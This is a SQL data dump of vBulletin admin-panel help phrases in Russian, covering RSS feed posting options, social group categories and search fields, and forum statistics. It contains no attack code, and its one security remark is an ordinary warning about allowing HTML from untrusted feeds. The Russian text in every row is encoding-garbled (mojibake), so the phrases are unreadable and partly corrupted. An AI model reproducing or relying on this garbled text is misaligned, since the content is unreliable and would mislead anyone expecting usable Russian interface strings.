(23838, -1, 'resources_viewuser_text', 'cphelptext', 'Çäåñü âû ìîæåòå ïðîñìîòðåòü ïðà âà ïîëüçîâà òåëÿ Ãà óðîâÃÃ¥ ðà çäåëà .', 'vbulletin', '', 0, ''),
(23839, -1, 'resources_viewuser_title', 'cphelptext', 'Ãðîñìîòð ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(23840, -1, 'rssposter_edit_resetlastrun_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âûáðà Ãà , òî ïðè ñîõðà ÃÃ¥Ãèè ëåÃòû âðåìÿ ïîñëåäÃåé ïðîâåðêè áóäåò ñáðîøåÃî. Ñëåäîâà òåëüÃî, äà ÃÃà ÿ ëåÃòà áóäåò ïðîâåðåÃà ïðè ñëåäóþùåì çà ïóñêå çà ïëà Ãèðîâà ÃÃîé çà äà ÷è ïîääåðæêè RSS, âÃÃ¥ çà âèñèìîñòè îò îïöèè ÷à ñòîòû ïðîâåðêè äà ÃÃîé ëåÃòû.', 'vbulletin', 'zCarot', 1209205296, '3.7.0'),
(23841, -1, 'rssposter_edit_resetlastrun_title', 'cphelptext', 'Ñáðîñ âðåìåÃè ïîñëåäÃåé ïðîâåðêè', 'vbulletin', 'zCarot', 1149677250, '3.6.0 Beta 1'),
(23842, -1, 'rssposter_edit_enabled_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ëåÃòà ÃÃ¥ áóäåò ïðîâåðåÃà ïðè çà ïóñêå ñîîòâåòñòâóþùåé çà ïëà Ãèðîâà ÃÃîé çà äà ÷è. \r\n \r\nÃòî èñïîëüçóåòñÿ äëÿ âðåìåÃÃîãî îòêëþ÷åÃèÿ ëåÃòû áåç å¸ óäà ëåÃèÿ.', 'vbulletin', 'zCarot', 1149677240, '3.6.0 Beta 1'),
(23843, -1, 'rssposter_edit_enabled_title', 'cphelptext', 'RSS ëåÃòà âêëþ÷åÃà ', 'vbulletin', 'zCarot', 1149677240, '3.6.0 Beta 1'),
(23844, -1, 'rssposter_edit_title_text', 'cphelptext', 'Çà ãîëîâîê äîëæåà êðà òêî îïèñûâà òü ñîäåðæèìîå ëåÃòû äëÿ óïðîùåÃèÿ ïîèñêà â óïðà âëåÃèè RSS ëåÃòà ìè.', 'vbulletin', 'zCarot', 1149677290, '3.6.0 Beta 1'),
(23845, -1, 'rssposter_edit_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', 'zCarot', 1149677290, '3.6.0 Beta 1'),
(23846, -1, 'rssposter_edit_url_text', 'cphelptext', 'Ãòî ïîëå äîëæÃî ñîäåðæà òü ïîëÃûé à äðåñ ëåÃòû. \r\n \r\nÃà ïðèìåð: http://www.example.com/forum/external.php?type=RSS2&forumids=1
', 'vbulletin', 'zCarot', 1149677544, '3.6.0 Beta 1'),
(23847, -1, 'rssposter_edit_url_title', 'cphelptext', 'Àäðåñ ëåÃòû', 'vbulletin', 'zCarot', 1149677544, '3.6.0 Beta 1'),
(23848, -1, 'rssposter_edit_ttl_text', 'cphelptext', 'Çà ïëà Ãèðîâà ÃÃà ÿ çà äà ÷à ïîääåðæêè RSS çà ïóñêà åòñÿ êà æäûå 10 ìèÃóò, ïîýòîìó âû ìîæåòå îãðà Ãè÷èòü ÷à ñòîòó ïðîâåðêè äà ÃÃîé ëåÃòû ñ òî÷Ãîñòüþ äî 10 ìèÃóò.', 'vbulletin', 'zCarot', 1149677740, '3.6.0 Beta 1'),
(23849, -1, 'rssposter_edit_ttl_title', 'cphelptext', 'Ãðîâåðÿòü ëåÃòó êà æäûå...', 'vbulletin', 'zCarot', 1149677740, '3.6.0 Beta 1'),
(23850, -1, 'rssposter_edit_maxresults_text', 'cphelptext', 'Ãåêîòîðûå ëåÃòû ìîãóò âûäà âà òü ñïèñîê èç Ãåñêîëüêèõ ýëåìåÃòîâ ñðà çó. Åñëè âû æåëà åòå îãðà Ãè÷èòü ÷èñëî îáðà áà òûâà åìûõ ýëåìåÃòîâ çà îäÃó ïðîâåðêó, òî ââåäèòå ñþäà èõ ìà êñèìà ëüÃîå êîëè÷åñòâî. \r\n \r\nÃà ïðèìåð, åñëè âû çäåñü óêà æåòå \"5\", òî øåñòîé, ñåäüìîé è ïîñëåäóþùèå ýëåìåÃòû áóäóò ïðîèãÃîðèðîâà Ãû. \r\n \r\nÂâåäèòå 0, ÷òîáû îáðà áà òûâà òü âñå ýëåìåÃòû.', 'vbulletin', 'zCarot', 1149677952, '3.6.0 Beta 1'),
(23851, -1, 'rssposter_edit_maxresults_title', 'cphelptext', 'Ìà êñèìóì ýëåìåÃòîâ äëÿ îáðà áîòêè', 'vbulletin', 'zCarot', 1149677952, '3.6.0 Beta 1'),
(23852, -1, 'rssposter_edit_searchwords_text', 'cphelptext', 'Âû ìîæåòå óêà çà òü ñïèñîê ñëîâ è ôðà ç, ïî êîòîðûì ñëåäóåò âûáèðà òü ýëåìåÃòû ëåÃòû RSS. \r\nÃà çäåëÿéòå êà æäîå ñëîâî/ôðà çó ïðîáåëîì èëè ïåðåâîäîì ñòðîêè. \r\nÔðà çû, êîòîðûå ñîäåðæà ò ïðîáåëû ìîæÃî äîáà âèòü, åñëè ïîìåñòèòü âîêðóã Ãèõ äâîéÃûå êà âû÷êè. \r\nÅñëè ëþáîå èç ýòèõ ñëîâ èëè ôðà ç áóäåò Ãà õîäèòüñÿ â çà ãîëîâêå (èëè çà ãîëîâêå È îïèñà Ãèè, åñëè âûáðà Ãî \"Èñêà òü â îïèñà Ãèè\"), òî ýëåìåÃò áóäåò ðà çìåù¸à Ãà ôîðóìå. Åñëè ñîâïà äåÃèé Ãåò, òî ýëåìåÃò áóäåò ïðîèãÃîðèðîâà Ã. \r\nÅñëè âûáðà Ãî \"Ñîâïà äåÃèå âñåõ ñëîâ\", òî áóäóò ðà çìåùåÃû òîëüêî òå ýëåìåÃòû, â êîòîðûõ âñòðå÷à þòñÿ ÂÑÅ óêà çà ÃÃûå çäåñü ñëîâà è ôðà çû. ', 'vbulletin', 'zCarot', 1220447959, '3.8.0 Alpha 1'),
(23853, -1, 'rssposter_edit_searchwords_title', 'cphelptext', 'Âûáîðêà ýëåìåÃòîâ ïî ñëîâà ì', 'vbulletin', 'zCarot', 1149679577, '3.6.0 Beta 1'),
(23854, -1, 'rssposter_edit_username_text', 'cphelptext', 'Ââåäèòå ñþäà èìÿ ïîëüçîâà òåëÿ, ïîä êîòîðûì áóäóò ðà çìåùà òüñÿ ýëåìåÃòû ëåÃòû Ãà ôîðóìå. \r\n \r\nÈìÿ ïîëüçîâà òåëÿ äîëæÃî óæå áûòü çà ðåãèñòðèðîâà Ãî Ãà ôîðóìå! Ñîâåò: âû ìîæåòå ñîçäà òü Ãîâîãî ïîëüçîâà òåëÿ ñïåöèà ëüÃî äëÿ ðà çìåùåÃèÿ ýëåìåÃòîâ RSS ëåÃò.', 'vbulletin', 'zCarot', 1149678038, '3.6.0 Beta 1'),
(23855, -1, 'rssposter_edit_username_title', 'cphelptext', 'Èìÿ', 'vbulletin', 'zCarot', 1149678038, '3.6.0 Beta 1'),
(23856, -1, 'rssposter_edit_forumid_text', 'cphelptext', 'Óêà æèòå çäåñü ðà çäåë, â êîòîðûé âû æåëà åòå ïîìåùà òü ýëåìåÃòû èç äà ÃÃîé RSS ëåÃòû. \r\n \r\nÂà æÃî: óáåäèòåñü, ÷òî ðà çäåë ÃÃ¥ ÿâëÿåòñÿ êà òåãîðèåé.', 'vbulletin', 'zCarot', 1149678216, '3.6.0 Beta 1'),
(23857, -1, 'rssposter_edit_forumid_title', 'cphelptext', 'Ãà çäåë', 'vbulletin', 'zCarot', 1149678060, '3.6.0 Beta 1'),
(23858, -1, 'rssposter_edit_allowsmilies_text', 'cphelptext', 'Åñëè \"Äà \", òî ëþáûå êîäû ñìà éëîâ, êîòîðûå áóäóò Ãà éäåÃû â ýëåìåÃòà õ RSS ëåÃòû, áóäóò ïðåîáðà çîâà Ãû â ñîîòâåòñòâóþùèå èçîáðà æåÃèÿ.', 'vbulletin', 'zCarot', 1149678268, '3.6.0 Beta 1'),
(23859, -1, 'rssposter_edit_allowsmilies_title', 'cphelptext', 'ÊîÃâåðòèðîâà òü ñìà éëû', 'vbulletin', 'zCarot', 1149678268, '3.6.0 Beta 1'),
(23860, -1, 'rssposter_edit_showsignature_text', 'cphelptext', 'Åñëè \"Äà \", òî ïðè ðà çìåùåÃèè ýëåìåÃòîâ RSS ëåÃòû áóäåò îòîáðà æà òüñÿ ïîäïèñü ïîëüçîâà òåëÿ, ïîä êîòîðûì îÃè áóäóò ðà çìåùà òüñÿ.', 'vbulletin', 'zCarot', 1149678310, '3.6.0 Beta 1'),
(23861, -1, 'rssposter_edit_showsignature_title', 'cphelptext', 'Ãîêà çûâà òü ïîäïèñü', 'vbulletin', 'zCarot', 1149678310, '3.6.0 Beta 1'),
(23862, -1, 'rssposter_edit_html2bbcode_text', 'cphelptext', 'Åñëè âêëþ÷åÃî, òî ëþáîé HTML êîä, Ãà õîäÿùèéñÿ â RSS ëåÃòå, áóäåò ïåðåä ðà çìåùåÃèåì ïðåîáðà çîâà à â BB êîä. Ãòà îïöèÿ çà òðà ãèâà åò òîëüêî Ãîâûå ýëåìåÃòû. Óæå ðà çìåù¸ÃÃûå ÃÃ¥ áóäóò ïðåîáðà çîâà Ãû.', 'vbulletin', 'zCarot', 1206966113, '3.7.0 Release Candidate 2'),
(23863, -1, 'rssposter_edit_html2bbcode_title', 'cphelptext', 'Ãðåîáðà çîâà òü HTML â BB êîäû', 'vbulletin', 'zCarot', 1150892058, '3.6.0 Beta 3'),
(23864, -1, 'rssposter_edit_titletemplate_text', 'cphelptext', 'Øà áëîà çà ãîëîâêà îïðåäåëÿåò, êà ê áóäåò îòîáðà æà òüñÿ çà ãîëîâîê òåìû èëè îáúÿâëåÃèÿ ïðè ðà çìåùåÃèè ýëåìåÃòîâ RSS ëåÃòû. \r\n \r\nÂû ìîæåòå èñïîëüçîâà òü îïðåäåë¸ÃÃûå ÷à ñòè XML ëåÃòû ñ ïîìîùüþ äîáà âëåÃèÿ â øà áëîà {feed:x }, ãäå \'x\' ññûëà åòñÿ Ãà îäèà èç ïà ðà ìåòðîâ:\r\n\r\ntitle \r\ndescription \r\nlink \r\nid \r\ndate \r\nenclosure_href \r\ncontent:encoded. \r\n \r\n \r\n áîëüøèÃñòâå ñëó÷à åâ âà ì ñëåäóåò èñïîëüçîâà òü {feed:title}, ÷òîáû îòîáðà æà òü çà ãîëîâîê èç òåêóùåãî ýëåìåÃòà ëåÃòû.', 'vbulletin', 'zCarot', 1193149089, '3.7.0 Beta 1'),
(23865, -1, 'rssposter_edit_titletemplate_title', 'cphelptext', 'Øà áëîà çà ãîëîâêà ', 'vbulletin', 'zCarot', 1149682430, '3.6.0 Beta 1'),
(23866, -1, 'rssposter_edit_bodytemplate_text', 'cphelptext', 'Øà áëîà òåëà îïðåäåëÿåò îñÃîâÃîé òåêñò òåìû èëè îáúÿâëåÃèÿ äëÿ ýëåìåÃòîâ ëåÃòû. \r\n \r\nÒà ê æå, êà ê è â øà áëîÃÃ¥ çà ãîëîâêà , âû ìîæåòå èñïîëüçîâà òü îïðåäåë¸ÃÃûå ÷à ñòè XML ëåÃòû ñ ïîìîùüþ äîáà âëåÃèÿ â øà áëîà {feed:x }. \r\nÄîïóñòèìûå çÃà ÷åÃèÿ äëÿ ïà ðà ìåòðà x: \r\n\r\ntitle \r\ndescription \r\nlink \r\nid \r\ndate \r\nenclosure_href \r\ncontent:encoded. \r\n \r\n \r\nÎñÃîâÃûìè ïà ðà ìåòðà ìè äëÿ øà áëîÃà òåëà ÿâëÿþòñÿ <description> è <link>, êîòîðûå ìîãóò áûòü âñòà âëåÃû ñ ïîìîùüþ {feed:description} è {feed:link} . \r\n \r\nÃà ïðèìåð:\r\n[b] [i]ìîåé RSS ëåÃòå[/i] òîëüêî ÷òî ïîÿâèëîñü ñëåäóþùåå:[/b]\r\n\r\n{feed:description} \r\n\r\n[url="{feed:link} "]Ãà æìèòå çäåñü, ÷òîáû ïðî÷åñòü ïîëÃóþ çà ïèñü.[/url] ', 'vbulletin', 'zCarot', 1193149585, '3.7.0 Beta 1'),
(23867, -1, 'rssposter_edit_bodytemplate_title', 'cphelptext', 'Øà áëîà òåëà ', 'vbulletin', 'zCarot', 1149682725, '3.6.0 Beta 1'),
(23868, -1, 'rssposter_edit_itemtype_text', 'cphelptext', 'ÃëåìåÃòû èç RSS ëåÃòû ìîãóò áûòü ðà çìåùåÃû Ãà ôîðóìå â âèäå òåì èëè îáúÿâëåÃèé. \r\n \r\nÃà çëè÷Ãûå ïà ðà ìåòðû äëÿ êà æäîãî òèïà ðà çìåùåÃèÿ îïèñà Ãû Ãèæå. \r\n \r\nÃîìÃèòå, ÷òî ïîëüçîâà òåëè ÃÃ¥ ñìîãóò îòâåòèòü â îáúÿâëåÃèè. Ãîýòîìó, åñëè âû æåëà åòå, ÷òîáû ðà çìåùåÃèå ýëåìåÃòîâ RSS ëåÃòû îáñóæäà ëîñü ïîëüçîâà òåëÿìè, òî, âåðîÿòÃî, ëó÷øå ñòîèò ðà çìåùà òü ýëåìåÃòû êà ê òåìû.', 'vbulletin', 'zCarot', 1149683708, '3.6.0 Beta 1'),
(23869, -1, 'rssposter_edit_itemtype_title', 'cphelptext', 'Ñîçäà âà òü ýëåìåÃòû êà ê òåìû èëè îáúÿâëåÃèÿ', 'vbulletin', 'zCarot', 1149683708, '3.6.0 Beta 1'),
(23870, -1, 'rssposter_edit_prefixid_text', 'cphelptext', 'Âû ìîæåòå èñïîëüçîâà òü äà ÃÃûé ïà ðà ìåòð, ÷òîáû à âòîìà òè÷åñêè äîáà âëÿòü ïðåôèêñ ê ñîçäà âà åìûì òåìà ì. ÎäÃà êî, äà ÃÃûé ïðåôèêñ äîëæåà áûòü ðà çðåø¸à â ðà çäåëå, ãäå áóäóò ðà çìåùåÃû Ãîâûå òåìû. ×òîáû óáåäèòüñÿ, ÷òî äà ÃÃûé ïðåôèêñ ðà çðåø¸à â âûáðà ÃÃîì ðà çäåëå, âà ì ñëåäóåò óçÃà òü, â êà êîì Ãà áîðå ïðåôèêñîâ Ãà õîäèòñÿ âûáðà ÃÃûé âà ìè ïðåôèêñ, à çà òåì ïåðåéòè â \"óïðà âëåÃèå ðà çäåëà ìè\" è îòðåäà êòèðîâà òü âûáðà ÃÃûé ðà çäåë äëÿ ýòîé ëåÃòû, äîáà âèâ (èëè óáåäèâøèñü, ÷òî óæå äîáà âëåÃ) ÃóæÃûé Ãà áîð ïðåôèêñîâ.', 'vbulletin', 'zCarot', 1190110337, '3.7.0 Beta 1'),
(23871, -1, 'rssposter_edit_prefixid_title', 'cphelptext', 'Ãðåôèêñ', 'vbulletin', 'zCarot', 1190110337, '3.7.0 Beta 1'),
(23872, -1, 'rssposter_edit_iconid_text', 'cphelptext', 'Âûáåðèòå èêîÃêó, êîòîðà ÿ áóäåò èñïîëüçîâà Ãà äëÿ òåì, ñîçäà ÃÃûõ èç ýëåìåÃòîâ äà ÃÃîé RSS ëåÃòû.', 'vbulletin', 'zCarot', 1149683270, '3.6.0 Beta 1'),
(23873, -1, 'rssposter_edit_iconid_title', 'cphelptext', 'ÈêîÃêè äëÿ ñîîáùåÃèÿ', 'vbulletin', 'zCarot', 1149683270, '3.6.0 Beta 1'),
(23874, -1, 'rssposter_edit_stickthread_text', 'cphelptext', 'Âûáåðèòå \"Äà \", åñëè âû æåëà åòå, ÷òîáû òåìû, ñîçäà ÃÃûå èç ýëåìåÃòîâ äà ÃÃîé RSS ëåÃòû, à âòîìà òè÷åñêè ïîìå÷à ëèñü êà ê \"âà æÃûå\", ÷òî ïîçâîëèò ïîìåñòèòü èõ Ãà âåðõ ñïèñêà îòîáðà æåÃèÿ òåì ðà çäåëà .', 'vbulletin', 'zCarot', 1149683771, '3.6.0 Beta 1'),
(23875, -1, 'rssposter_edit_stickthread_title', 'cphelptext', 'Ñäåëà òü òåìó âà æÃîé', 'vbulletin', 'zCarot', 1149683771, '3.6.0 Beta 1'),
(23876, -1, 'rssposter_edit_moderatethread_text', 'cphelptext', 'Åñëè âû æåëà åòå, ÷òîáû ïåðåä ðà çìåùåÃèåì ýëåìåÃòîâ ðóêîâîäñòâî ôîðóìà ìîãëî ïðîñìîòðåòü è îòðåäà êòèðîâà òü êà æäûé ýëåìåÃò RSS ëåÃòû äî òîãî êà ê îà ïîÿâèòñÿ Ãà ôîðóìå, òî âûáåðèòå çäåñü \"Äà \".', 'vbulletin', 'zCarot', 1149683930, '3.6.0 Beta 1'),
(23877, -1, 'rssposter_edit_moderatethread_title', 'cphelptext', 'Ãðîâåðêà òåì', 'vbulletin', 'zCarot', 1149683930, '3.6.0 Beta 1'),
(23878, -1, 'rssposter_edit_threadactiondelay_text', 'cphelptext', 'Åñëè ýëåìåÃòû ðà çìåùà þòñÿ êà ê òåìû, òî âû ìîæåòå óêà çà òü çäåñü âðåìÿ, ïî ïðîøåñòâèè êîòîðîãî áóäåò âûïîëÃÃ¥Ãî Ãåêîòîðîå äåéñòâèå Ãà ä òåìîé. \r\n \r\nÃà ïðèìåð, âû ìîæåòå óêà çà òü çäåñü 6 ÷à ñîâ è Ãèæå óêà çà òü çà êðûòèå òåì ïîñëå èñòå÷åÃèÿ ýòîãî âðåìåÃè. \r\n \r\nÅñëè çäåñü óêà çà Ãî 0, òî òåìà Ãèêîãäà ÃÃ¥ óñòà ðååò, ïîýòîìó Ãèêà êèå äåéñòâèÿ ÃÃ¥ áóäóò âûïîëÃÃ¥Ãû à âòîìà òè÷åñêè ïîñëå ñîçäà Ãèÿ òåì èç ýëåìåÃòîâ RSS ëåÃòû.', 'vbulletin', 'zCarot', 1149684592, '3.6.0 Beta 1'),
(23879, -1, 'rssposter_edit_threadactiondelay_title', 'cphelptext', 'Âðåìÿ óñòà ðåâà Ãèÿ òåìû', 'vbulletin', 'zCarot', 1149684477, '3.6.0 Beta 1'),
(23880, -1, 'rssposter_edit_unstickthread_text', 'cphelptext', 'Âêëþ÷èòå ýòó îïöèþ, ÷òîáû ñÃèìà òü ñòà òóñ \"Âà æÃà ÿ\" ñ òåì èç ýëåìåÃòîâ RSS ëåÃòû, ïîñëå òîãî êà ê îÃè óñòà ðåþò.', 'vbulletin', 'zCarot', 1149684720, '3.6.0 Beta 1'),
(23881, -1, 'rssposter_edit_unstickthread_title', 'cphelptext', 'ÑÃèìà òü ñòà òóñ \"Âà æÃà ÿ\" ñ òåìû ïðè óñòà ðåâà Ãèè', 'vbulletin', 'zCarot', 1149684697, '3.6.0 Beta 1'),
(23882, -1, 'rssposter_edit_closethread_text', 'cphelptext', 'Âêëþ÷èòå ýòó îïöèþ, ÷òîáû à âòîìà òè÷åñêè çà êðûâà òü òåìû èç ýëåìåÃòîâ RSS ëåÃòû, ïîñëå òîãî êà ê îÃè óñòà ðåþò.', 'vbulletin', 'zCarot', 1149684686, '3.6.0 Beta 1'),
(23883, -1, 'rssposter_edit_closethread_title', 'cphelptext', 'Çà êðûâà òü òåìó ïðè óñòà ðåâà Ãèè', 'vbulletin', 'zCarot', 1149684703, '3.6.0 Beta 1'),
(23884, -1, 'rssposter_edit_allowhtml_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, òî ëþáîé HTML êîä â ýëåìåÃòà õ RSS ëåÃòû áóäåò âñòà âëÿòüñÿ â îáúÿâëåÃèÿ êà ê HTML êîä. \r\n \r\nÃÃ¥ âêëþ÷à éòå ýòó îïöèþ, åñëè âû ÃÃ¥ ïîëÃîñòüþ äîâåðÿåòå èñòî÷Ãèêó RSS ëåÃòû, òà ê êà ê ïðè äîáà âëåÃèè îïðåäåë¸ÃÃîãî HTML êîäà âà ø ôîðóì ìîæåò áûòü âçëîìà Ã! ', 'vbulletin', 'zCarot', 1149684884, '3.6.0 Beta 1'),
(23885, -1, 'rssposter_edit_allowhtml_title', 'cphelptext', 'Ãà çðåøèòü HTML â îáúÿâëåÃèÿõ', 'vbulletin', 'zCarot', 1149684884, '3.6.0 Beta 1'),
(23886, -1, 'rssposter_edit_endannouncement_text', 'cphelptext', 'Ãî ïðîøåñòâèè ýòîãî êîëè÷åñòâà äÃåé äà ÃÃîå îáúÿâëåÃèå ñòà Ãåò Ãåà êòèâÃûì è èñ÷åçÃåò ñ ïóáëè÷Ãîãî îáîçðåÃèÿ.', 'vbulletin', 'zCarot', 1149684933, '3.6.0 Beta 1'),
(23887, -1, 'rssposter_edit_endannouncement_title', 'cphelptext', 'Êîëè÷åñòâî äÃåé, â òå÷åÃèå êîòîðûõ áóäåò à êòèâÃî îáúÿâëåÃèå', 'vbulletin', 'zCarot', 1149684933, '3.6.0 Beta 1'),
(23888, -1, 'socialgroup_icon_switchtype_groupiconpath_text', 'cphelptext', 'Ãòî ïóòü ê èêîÃêà ì ñîöèà ëüÃûõ ãðóïï, ïî êîòîðîìó îÃè õðà Ãÿòñÿ â ôà éëîâîé ñèñòåìå (åñëè, êîÃå÷Ãî, îÃè õðà Ãÿòñÿ ÃÃ¥ â áà çå äà ÃÃûõ). ÃÃ¥ ñëåäóåò èçìåÃÿòü ýòîò ïà ðà ìåòð, åñëè âû ÃÃ¥ óâåðåÃû, ÷òî ïðà âèëüÃî ïîñòóïà åòå.', 'vbulletin', 'zCarot', 1220958784, '3.8.0 Alpha 1'),
(23889, -1, 'socialgroup_icon_switchtype_groupiconpath_title', 'cphelptext', 'Ãóòü ê ôà éëà ì èêîÃîê ñîöèà ëüÃûõ ãðóïï', 'vbulletin', 'zCarot', 1220958784, '3.8.0 Alpha 1'),
(23890, -1, 'socialgroup_icon_switchtype_groupiconurl_text', 'cphelptext', 'Ãòî ññûëêà Ãà äèðåêòîðèþ, â êîòîðîé õðà Ãÿòñÿ èêîÃêè ñîöèà ëüÃûõ ãðóïï, åñëè îÃè õðà Ãÿòñÿ â ôà éëîâîé ñèñòåìå. ÃÃ¥ ñëåäóåò èçìåÃÿòü ýòîò ïà ðà ìåòð, åñëè âû ÃÃ¥ óâåðåÃû, ÷òî ïðà âèëüÃî ïîñòóïà åòå.', 'vbulletin', 'zCarot', 1220958848, '3.8.0 Alpha 1'),
(23891, -1, 'socialgroup_icon_switchtype_groupiconurl_title', 'cphelptext', 'Ññûëêà Ãà èêîÃêè ñîöèà ëüÃûõ ãðóïï ', 'vbulletin', 'zCarot', 1220958848, '3.8.0 Alpha 1'),
(23892, -1, 'socialgroups_editcategory_description_text', 'cphelptext', 'ÃîäðîáÃîå îïèñà Ãèå äà ÃÃîé êà òåãîðèè.', 'vbulletin', 'zCarot', 1220958690, '3.8.0 Alpha 1'),
(23893, -1, 'socialgroups_editcategory_description_title', 'cphelptext', 'Îïèñà Ãèå', 'vbulletin', 'zCarot', 1220958657, '3.8.0 Alpha 1'),
(23894, -1, 'socialgroups_editcategory_displayorder_text', 'cphelptext', 'Îïðåäåëÿåò ìåñòîïîëîæåÃèå â ñïèñêå âûáîðà êà òåãîðèé.', 'vbulletin', 'zCarot', 1220958714, '3.8.0 Alpha 1'),
(23895, -1, 'socialgroups_editcategory_displayorder_title', 'cphelptext', 'Ãîðÿäîê îòîáðà æåÃèÿ', 'vbulletin', 'zCarot', 1220958714, '3.8.0 Alpha 1'),
(23896, -1, 'socialgroups_editcategory_title_text', 'cphelptext', 'Ãà çâà Ãèå êà òåãîðèè ñîöèà ëüÃûõ ãðóïï. ÃŽÃî îòîáðà æà åòñÿ ïðè ïðîñìîòðå ñîöèà ëüÃîé ãðóïïå è âûáîðêå ñîöèà ëüÃûõ ãðóïï ïî êà òåãîðèÿì. Èç êà òåãîðèé ñîñòà âëÿåòñÿ îáëà êî ïðè îáçîðå ñîöèà ëüÃûõ ãðóïï.', 'vbulletin', 'zCarot', 1220958618, '3.8.0 Alpha 1'),
(23897, -1, 'socialgroups_editcategory_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', 'zCarot', 1220958618, '3.8.0 Alpha 1'),
(23898, -1, 'socialgroups_search_category_text', 'cphelptext', '>Èñêà òü ãðóïïû, ïðèÃà äëåæà ùèå óêà çà ÃÃîé êà òåãîðèè.', 'vbulletin', 'zCarot', 1215784065, '3.8.0 Alpha 1'),
(23899, -1, 'socialgroups_search_category_title', 'cphelptext', 'Êà òåãîðèÿ', 'vbulletin', 'zCarot', 1215784065, '3.8.0 Alpha 1'),
(23900, -1, 'socialgroups_search_creator_text', 'cphelptext', 'Èñêà òü ãðóïïû, îñÃîâà ÃÃûå äà ÃÃûì ïîëüçîâà òåëåì', 'vbulletin', 'zCarot', 1205513857, '3.7.0 Release Candidate 1'),
(23901, -1, 'socialgroups_search_creator_title', 'cphelptext', 'ÎñÃîâà òåëü ãðóïïû', 'vbulletin', 'zCarot', 1205513857, '3.7.0 Release Candidate 1'),
(23902, -1, 'socialgroups_search_date_gteq_text', 'cphelptext', 'Èñêà òü ãðóïïû, ñîçäà ÃÃûå ïîñëå ýòîé äà òû.', 'vbulletin', 'zCarot', 1205513779, '3.7.0 Release Candidate 1'),
(23903, -1, 'socialgroups_search_date_gteq_title', 'cphelptext', 'Äà òà ñîçäà Ãèÿ ïîñëå', 'vbulletin', 'zCarot', 1205513779, '3.7.0 Release Candidate 1'),
(23904, -1, 'socialgroups_search_date_lteq_text', 'cphelptext', 'Èñêà òü ãðóïïû, ñîçäà ÃÃûå ðà Ãåå ýòîé äà òû.', 'vbulletin', 'zCarot', 1205513744, '3.7.0 Release Candidate 1'),
(23905, -1, 'socialgroups_search_date_lteq_title', 'cphelptext', 'Äà òà ñîçäà Ãèÿ äî', 'vbulletin', 'zCarot', 1205513744, '3.7.0 Release Candidate 1'),
(23906, -1, 'socialgroups_search_filtertext_text', 'cphelptext', 'Ñëîâà , ïðèñóòñòâóþùèå â ñîöèà ëüÃîé ãðóïïå (â Ãà çâà Ãèè è/èëè îïèñà Ãèè).', 'vbulletin', 'zCarot', 1205513658, '3.7.0 Release Candidate 1'),
(23907, -1, 'socialgroups_search_filtertext_title', 'cphelptext', 'Êëþ÷åâûå ñëîâà ', 'vbulletin', 'zCarot', 1213632849, '3.8.0 Alpha 1'),
(23908, -1, 'socialgroups_search_members_gteq_text', 'cphelptext', 'Èñêà òü ãðóïïû ñ êîëè÷åñòâîì ó÷à ñòÃèêîâ áîëüøå óêà çà ÃÃîãî çäåñü.', 'vbulletin', 'zCarot', 1205513691, '3.7.0 Release Candidate 1'),
(23909, -1, 'socialgroups_search_members_gteq_title', 'cphelptext', 'Ó÷à ñòÃèêîâ áîëüøå', 'vbulletin', 'zCarot', 1205513691, '3.7.0 Release Candidate 1'),
(23910, -1, 'socialgroups_search_members_lteq_text', 'cphelptext', 'Èñêà òü ãðóïïû ñ êîëè÷åñòâîì ó÷à ñòÃèêîâ ìåÃüøå óêà çà ÃÃîãî çäåñü.', 'vbulletin', 'zCarot', 1205513712, '3.7.0 Release Candidate 1'),
(23911, -1, 'socialgroups_search_members_lteq_title', 'cphelptext', 'Ó÷à ñòÃèêîâ ìåÃüøå', 'vbulletin', 'zCarot', 1205513712, '3.7.0 Release Candidate 1'),
(23912, -1, 'socialgroups_search_type_text', 'cphelptext', 'Èñêà òü ãðóïïû äà ÃÃîãî òèïà .', 'vbulletin', 'zCarot', 1205513940, '3.7.0 Release Candidate 1'),
(23913, -1, 'socialgroups_search_type_title', 'cphelptext', 'Òèï ãðóïïû', 'vbulletin', 'zCarot', 1205513940, '3.7.0 Release Candidate 1'),
(23914, -1, 'stats_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÑòà òèñòèêà \r\nÇà ïèñè äåéñòâèé ïà Ãåëè à äìèÃèñòðà òîðà \r\nÇà ïèñè äåéñòâèé ìîäåðà òîðîâ \r\nÇà ïèñè âûïîëÃÃ¥Ãèé çà ïëà Ãèðîâà ÃÃûõ çà äà Ãèé \r\n\r\nÑòà òèñòèêà : \r\nÑòðà Ãèöà ñòà òèñòèêè ôîðóìà ñîäåðæèò â ñåáå ðà çÃîîáðà çÃóþ ñòà òèñòèêó âà øåãî ôîðóìà . Ñòà òèñòèêà Ãà ýòîé ñòðà Ãèöå âêëþ÷à åò â ñåáÿ ñòà òèñòèêó \"ñà ìûõ\" (Ñà ìûé Ãîâûé ïîëüçîâà òåëü Ãà ôîðóìå, Ëó÷øèé à âòîð, Ãåêîðä ïîñåùà åìîñòè ïîëüçîâà òåëåé è ò.ä.), à òà êæå ðà çÃîîáðà çÃóþ ñòà òèñòèêó à êòèâÃîñòè Ãà ôîðóìå. \r\n\r\nÂû ìîæåòå èçó÷èòü îïðåäåëåÃÃóþ ñòà òèñòèêó â îïðåäåëåÃÃîì ïåðèîäå, ÷òîáû ïîñìîòðåòü ôîðìû à êòèâÃîñòè Ãà âà øåì ôîðóìå. Ôîðìû à êòèâÃîñòè Ãà ôîðóìå ìîãóò èñïîëüçîâà òüñÿ â ðà çÃûõ âåùà õ. Ãà ïðèìåð, åñëè âû çà ïóñòèëè ðåêëà ìÃóþ êà ìïà Ãèþ äëÿ âà øåãî ñà éòà è æåëà åòå ïðîâåðèòü å¸ ýôôåêòèâÃîñòü â ðà ìêà õ Ãîâûõ ðåãèñòðà öèé Ãà ôîðóìå, òî âû ìîæåòå ïîñìîòðåòü ñòà òèñòèêó ðåãèñòðà öèé äî êà ìïà Ãèè è âî âðåìÿ Ãå¸.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(23915, -1, 'stats_title', 'cphelptext', 'Î ñòà òèñòèêå', 'vbulletin', '', 0, ''),
